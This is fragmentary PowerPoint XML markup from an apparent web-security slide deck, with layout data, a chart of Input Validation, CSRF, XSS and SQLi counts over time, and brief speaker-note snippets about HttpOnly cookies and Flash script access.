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750" r:id="rId2"/>
    <p:sldMasterId id="2147483764" r:id="rId3"/>
    <p:sldMasterId id="2147483778" r:id="rId4"/>
    <p:sldMasterId id="2147483792" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId110"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId111"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="560" r:id="rId6"/>
    <p:sldId id="570" r:id="rId7"/>
    <p:sldId id="773" r:id="rId8"/>
    <p:sldId id="576" r:id="rId9"/>
    <p:sldId id="562" r:id="rId10"/>
    <p:sldId id="568" r:id="rId11"/>
    <p:sldId id="569" r:id="rId12"/>
    <p:sldId id="566" r:id="rId13"/>
    <p:sldId id="567" r:id="rId14"/>
    <p:sldId id="656" r:id="rId15"/>
    <p:sldId id="702" r:id="rId16"/>
    <p:sldId id="597" r:id="rId17"/>
    <p:sldId id="599" r:id="rId18"/>
    <p:sldId id="600" r:id="rId19"/>
    <p:sldId id="601" r:id="rId20"/>
    <p:sldId id="712" r:id="rId21"/>
    <p:sldId id="713" r:id="rId22"/>
    <p:sldId id="714" r:id="rId23"/>
    <p:sldId id="565" r:id="rId24"/>
    <p:sldId id="588" r:id="rId25"/>
    <p:sldId id="602" r:id="rId26"/>
    <p:sldId id="604" r:id="rId27"/>
    <p:sldId id="603" r:id="rId28"/>
    <p:sldId id="605" r:id="rId29"/>
    <p:sldId id="595" r:id="rId30"/>
    <p:sldId id="606" r:id="rId31"/>
    <p:sldId id="563" r:id="rId32"/>
    <p:sldId id="610" r:id="rId33"/>
    <p:sldId id="611" r:id="rId34"/>
    <p:sldId id="625" r:id="rId35"/>
    <p:sldId id="715" r:id="rId36"/>
    <p:sldId id="718" r:id="rId37"/>
    <p:sldId id="717" r:id="rId38"/>
    <p:sldId id="716" r:id="rId39"/>
    <p:sldId id="719" r:id="rId40"/>
    <p:sldId id="616" r:id="rId41"/>
    <p:sldId id="617" r:id="rId42"/>
    <p:sldId id="624" r:id="rId43"/>
    <p:sldId id="721" r:id="rId44"/>
    <p:sldId id="722" r:id="rId45"/>
    <p:sldId id="720" r:id="rId46"/>
    <p:sldId id="707" r:id="rId47"/>
    <p:sldId id="749" r:id="rId48"/>
    <p:sldId id="750" r:id="rId49"/>
    <p:sldId id="751" r:id="rId50"/>
    <p:sldId id="752" r:id="rId51"/>
    <p:sldId id="753" r:id="rId52"/>
    <p:sldId id="754" r:id="rId53"/>
    <p:sldId id="755" r:id="rId54"/>
    <p:sldId id="756" r:id="rId55"/>
    <p:sldId id="757" r:id="rId56"/>
    <p:sldId id="758" r:id="rId57"/>
    <p:sldId id="759" r:id="rId58"/>
    <p:sldId id="760" r:id="rId59"/>
    <p:sldId id="761" r:id="rId60"/>
    <p:sldId id="762" r:id="rId61"/>
    <p:sldId id="763" r:id="rId62"/>
    <p:sldId id="764" r:id="rId63"/>
    <p:sldId id="765" r:id="rId64"/>
    <p:sldId id="723" r:id="rId65"/>
    <p:sldId id="724" r:id="rId66"/>
    <p:sldId id="725" r:id="rId67"/>
    <p:sldId id="726" r:id="rId68"/>
    <p:sldId id="727" r:id="rId69"/>
    <p:sldId id="728" r:id="rId70"/>
    <p:sldId id="729" r:id="rId71"/>
    <p:sldId id="730" r:id="rId72"/>
    <p:sldId id="731" r:id="rId73"/>
    <p:sldId id="732" r:id="rId74"/>
    <p:sldId id="733" r:id="rId75"/>
    <p:sldId id="734" r:id="rId76"/>
    <p:sldId id="735" r:id="rId77"/>
    <p:sldId id="738" r:id="rId78"/>
    <p:sldId id="739" r:id="rId79"/>
    <p:sldId id="740" r:id="rId80"/>
    <p:sldId id="741" r:id="rId81"/>
    <p:sldId id="742" r:id="rId82"/>
    <p:sldId id="743" r:id="rId83"/>
    <p:sldId id="744" r:id="rId84"/>
    <p:sldId id="745" r:id="rId85"/>
    <p:sldId id="746" r:id="rId86"/>
    <p:sldId id="747" r:id="rId87"/>
    <p:sldId id="748" r:id="rId88"/>
    <p:sldId id="618" r:id="rId89"/>
    <p:sldId id="619" r:id="rId90"/>
    <p:sldId id="620" r:id="rId91"/>
    <p:sldId id="621" r:id="rId92"/>
    <p:sldId id="622" r:id="rId93"/>
    <p:sldId id="655" r:id="rId94"/>
    <p:sldId id="623" r:id="rId95"/>
    <p:sldId id="637" r:id="rId96"/>
    <p:sldId id="638" r:id="rId97"/>
    <p:sldId id="639" r:id="rId98"/>
    <p:sldId id="640" r:id="rId99"/>
    <p:sldId id="641" r:id="rId100"/>
    <p:sldId id="642" r:id="rId101"/>
    <p:sldId id="643" r:id="rId102"/>
    <p:sldId id="766" r:id="rId103"/>
    <p:sldId id="767" r:id="rId104"/>
    <p:sldId id="768" r:id="rId105"/>
    <p:sldId id="769" r:id="rId106"/>
    <p:sldId id="770" r:id="rId107"/>
    <p:sldId id="771" r:id="rId108"/>
    <p:sldId id="772" r:id="rId10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9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="808080"/>
    <a:srgbClr val="869406"/>
    <a:srgbClr val="6666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47" autoAdjust="0"/>
    <p:restoredTop sz="94592" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73" d="100"/>
        </p:scale>
        <p:origin x="-780" y="-750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186"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="-1914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presProps" Target="presProps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102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide97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13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Sheet1!$B$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Input Validation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pPr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cat>
            <c:numRef>
              <c:f>Sheet1!$A$3:$A$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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</c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$3:$B$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/>
                <c:pt idx="0">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>231</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>386</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>312</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>303</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>385</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>370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Sheet1!$C$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>CSRF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pPr>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$3:$A$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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</c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$3:$C$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/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3</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>79</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>113</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>153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Sheet1!$D$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>XSS</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$3:$A$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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</c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$3:$D$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/>
                <c:pt idx="1">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>101</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>343</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>790</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>821</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>594</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>454</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>720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Sheet1!$E$2</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>SQLi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cat>
            <c:numRef>
              <c:f>Sheet1!$A$3:$A$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1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</c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$E$3:$E$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="14"/>
                <c:pt idx="3">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>49</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>91</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>252</c:v>
                </c:pt>
                <c:pt idx="9" formatCode="#,##0">
                  <c:v>1092</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>948</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>515</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>289</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>238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691776"/>
        <c:axId val="107038208"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="103691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038208"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="107038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6917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t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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8D74864-EB05-49AA-BA59-F6F5B3173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88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t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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9300"/>
            <a:ext cx="5362575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b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r"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B35E1360-550A-4529-B4D2-5DC013EF6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53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1DD2A54E-7F4A-4F8D-A2BF-E3597AA6488F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="965200"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W3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46BF2-BDC9-4A46-8C6B-5725797173F9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76"/>
            <a:fld id="{FECA9C15-561B-4BB1-94F5-81AFD468D0EE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defTabSz="965276"/>
              <a:t>62</a:t>
            </a:fld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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="47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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{EB7EED29-BC83-4F7A-BF0D-F9A0B1D3E2CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>87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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="47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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{5DCFB259-B646-486A-8557-3CA54B84E6E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>88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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="47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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{EB7EED29-BC83-4F7A-BF0D-F9A0B1D3E2CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>89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EF24E3-66CE-4EAD-839D-070122A087E4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142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HttpOnly in IE can be written to by script, but cannot be read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ACE478-A8F0-4A48-9704-0207FAF3866A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134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HttpOnly in IE can be written to by script, but cannot be read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904A546D-4F7E-42A3-A401-2722DE26BA08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>98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87D655A4-9836-418D-A32F-B201A5C1FF76}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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15E55E8C-DFFB-430A-AEF8-5ADB56F4FBCE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>99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CFD1C102-9507-4FA8-81A7-7297927106E6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>100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D605EE26-1CB0-4E2A-B84D-C747D8E5CCE1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>101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568ED943-A644-4C17-8A4D-0F3838B180B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="966788"/>
              <a:t>102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673BA8A2-3806-44CB-8868-D0DD35F11572}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>103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ED8FEA-7778-4676-91F7-45872229C0A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>104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Personalization:  NY Times says “Hi Fred”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6C6A965A-ACD5-4A3F-ADC5-CAF86F6BCB51}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200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D8F60AA1-4A90-48DC-BEF0-CB42F8058452}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200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B4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>13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C24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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Allowscriptaccess:   alows flash object to communicate with external scripts, navigate frames, and open windows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067274-9BDE-4C79-90CE-228DCCF141ED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53FFE947-B96B-4BD9-9503-1AFDA9018BFF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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6381CE-79EE-4B91-90B2-53CD43D08136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1028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6" name="Group 1029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6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3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4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5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6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7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8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9" name="Line 1051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0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2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7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8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9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0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2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4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5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6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8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0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3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5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6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7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8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7" name="Line 1081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1082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1083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Line 1084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Line 1085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Arc 108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087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1088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Line 1089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Arc 1090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69123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69124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9" name="Rectangle 109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" name="Rectangle 109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" name="Rectangle 109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020C872-3BC4-4E8F-8435-60B84CF2BB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24000"/>
            <a:ext cx="3924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924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20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069060" name="Rectangle 1028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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029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069062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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3" name="Line 1051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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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10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11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12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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069113" name="Line 1081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5" name="Group 1082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069115" name="Line 1083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16" name="Line 1084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17" name="Line 1085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18" name="Arc 108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6" name="Group 1087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1069120" name="Line 1088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21" name="Line 1089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22" name="Arc 1090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1069123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69124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69125" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069126" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 109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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C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90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0574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60198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1524000"/>
            <a:ext cx="8001000" cy="5257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24000"/>
            <a:ext cx="3924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924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1028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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029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9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20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21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22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23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24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25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26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27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28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29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30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31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32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33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34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35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36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37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38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39" name="Line 1051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40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41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42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43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44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45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46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47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48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49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50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51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52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53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54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55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56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57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58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59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60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61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62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63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64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65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66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67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68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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Line 1081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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 1082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1083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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Line 1084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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Line 1085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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Arc 108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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 1087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1088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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Line 1089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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Arc 1090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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069123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69124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9" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 109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F07E4F-DE23-47CB-8EA0-3280D72B6049}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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04800"/>
            <a:ext cx="19621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7340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069060" name="Rectangle 1028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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029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069062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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3" name="Line 1051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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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10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11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12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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069113" name="Line 1081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5" name="Group 1082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069115" name="Line 1083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16" name="Line 1084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17" name="Line 1085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18" name="Arc 108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6" name="Group 1087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1069120" name="Line 1088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21" name="Line 1089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22" name="Arc 1090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1069123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69124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69125" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069126" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 109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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C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0574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60198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1524000"/>
            <a:ext cx="8001000" cy="5257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24000"/>
            <a:ext cx="3924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924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069060" name="Rectangle 1028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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029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069062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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3" name="Line 1051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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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10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11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12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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1069113" name="Line 1081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5" name="Group 1082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069115" name="Line 1083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16" name="Line 1084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17" name="Line 1085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18" name="Arc 108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6" name="Group 1087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1069120" name="Line 1088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21" name="Line 1089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22" name="Arc 1090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1069123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69124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69125" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069126" name="Rectangle 109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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 109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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C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0574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60198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1524000"/>
            <a:ext cx="8001000" cy="5257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24000"/>
            <a:ext cx="3924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924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05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2060" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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38" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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9" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
